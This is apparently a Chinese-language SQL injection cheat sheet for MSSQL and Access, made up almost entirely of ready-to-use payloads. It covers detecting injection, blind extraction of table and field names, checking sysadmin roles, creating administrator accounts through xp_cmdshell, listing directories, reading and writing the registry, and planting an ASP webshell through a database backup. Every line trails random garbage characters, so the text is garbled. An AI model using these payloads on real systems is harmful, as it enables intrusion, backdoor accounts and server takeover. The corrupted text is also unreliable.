1.判断是否有注入;and 1=1 ;and 1=2 �5><�T#0W?
2.初步判断是否是mssql ;and user>0 g&�rz*)�|/
�TPn#cIPG�
3.注入参数是字符'and [查询条件] and ''=' P��s��M8J
�3qkP�e_<I
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �Z~]�G+�(�
?4��#UW7I�
5.判断数据库系统 p"�0��D�l9
dVSQG947i:
;and (select count(*) from sysobjects)>0 mssql Pq,�iR ��J
~?�:>��=�x
;and (select count(*) from msysobjects)>0 access
�H 3�so&_
�=~��TPrO^
W�[:CC�CDL
�`<�-/e%�8
6.猜数据库 ;and (select Count(*) from [数据库名])>0 <k 'zz:[c!
s6k(K>Pl�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 S1��#5oy�2
�c8�Nl$�|B
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 7�c!#e=W@B
o�wx0J,,�G
9.(1)猜字段的ascii值(access) ?}U?Q7vx@@
w�:A�SB>,!
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Z�gfh�NI\�
O1���!�YHo
(2)猜字段的ascii值(mssql) mD%IHzbn
H
�[Z^�26/5a
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 sB5@6�[VDI
gs&F
.�n
10.测试权限结构(mssql) P$.$M}rMv�
&crR� nv�?
��F*��_�+k
m'-QVZ{(M%
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �qE�RJEyU?
y�L� %88,/
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- <cxe ����
Z�23T����2
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- [6Q1�yN�E�
)J�?8"+_�Y
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ]X> �I(p@�
BO��2s(�8�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ,H_d#�Koa.
rX0 �?m:&m
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ;I*N%a� TK
MDBqIL]H�c
;and 1=(select IS_MEMBER('db_owner'));-- �yxi&80��$
%,�S��{9�q
x��X�fv�({
k2(k�0�HFR
11.添加mssql和系统的帐户 %�F�x���^"
#pyF�IUr=w
;exec master.dbo.sp_addlogin username;-- 0\�Tp��/Ph
;exec master.dbo.sp_password null,username,password;-- �bB)$=��7\
RK��ZBI?@4
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- s�N K^.�0
J50n�
E��~
;exec master.dbo.xp_cmdshell 'net user username password cG&@PO�]+.
;ik,6_��/Y
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 2�B^�WZ�lx
bVzJ��OB�e
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �!S�T7@��D
{�9���*
l�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- }�$[@���*
��T�\#Gc�4
jr��p�ki<D
�I>�q!co9n
12.(1)遍历目录 H^dw=k�S�
��tN.$4+��
;create table dirs(paths varchar(100), id int) h�iv {A9a?
_2{2��Xb��
;insert dirs exec master.dbo.xp_dirtree 'c:\' �gjx-tp 1.
q�Moo�#�UX
;and (select top 1 paths from dirs)>0 x�UNq!�({T
5gk��Q6&�m
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) /�N#�=�Tol
�hAt4�+O&P
;GKL[�t�I"
�`��q`ah_
(2)遍历目录 zG{j��Rth�
��'u%v�pvF
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- vz)�R8�4��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �8�llX�p�e
Nwd�rJ�w9�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Xp�Yd�|BvW
e.^?���hwl
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��K4]�#�X"
*sau['H�a
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 i6$HwRZm�#
�W�X]O�1�Y
E�dTL]Xk�
olr-o�i`4C
13.mssql中的存储过程 ���Mp=T;Nz
|!�/+��T^u
xp_regenumvalues 注册表根键, 子键 ��p]<)6�sZ
It�<Vj�N9
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �_s<s14+od
a��4���7e�
xp_regread 根键,子键,键值名 n �83�Dt*O
f96`n+>x�i
;exec xp_regread i8p$wf"�aW
�;Qi!~VsP;
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ���p1�hF.
MK1#�^9Zr
xp_regwrite 根键,子键, 值名, 值类型, 值 VFMn"bY�OB
'p�78^4'PL
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 X&h?1lMJ /
PVIZ
Y^�64
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 q�[+�h ~)�
�)w�XE��\$
xp_regdeletevalue 根键,子键,值名 ti$6�0�U�p
u+
hRaI;v�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 .C�&kWM�&j
<lNN�T6[/r
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 $|7=$~�y��
X|/RV4x@Cq
cM��CM>�*X
*&\6x}.�I4
14.mssql的backup创建webshell !�* KQ2#e�
Jw��#7b[a�
use model ,0i��lNi�>
gz~u��g35�
create table cmd(str image); �Jt�#HbAY�
"�q1S.3V;
insert into cmd(str) values (''); @t�@�B�(1T
8)1��=5�n�
backup database model to disk='c:\l.asp'; C�rSB��N�~
N-t�"CBTO
�i�z)�r.TJ
]�N�;�n��q
15.mssql内置函数 �uM�puS�1
�+IWf�~|s
;and (select @@version)>0 获得Windows的版本号 K����:kb&W
dG8mE&�$g�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa c�5uC?b�].
*4L�Rd�LMn
;and (select user_name())>0 爆当前系统的连接用户 O*b�zp-�6\
XT*/�aa-1'
;and (select db_name())>0 得到当前连接的数据库 b|@zjh;]A7
7k�u=roPoF
(C�1�~>7�L
/hmDe�P�o}
16.简洁的webshell =
Ezg3$%-
$}�0�!d�R2
use model =�=g�L�!e{
-QR]BD%J*[
create table cmd(str image); ��r[T(�R9k
w{lj'�3z I
insert into cmd(str) values (''); �aMxj{*v�7
?���.�uh�p
backup database model to disk='g:\wwwtest\l.asp';
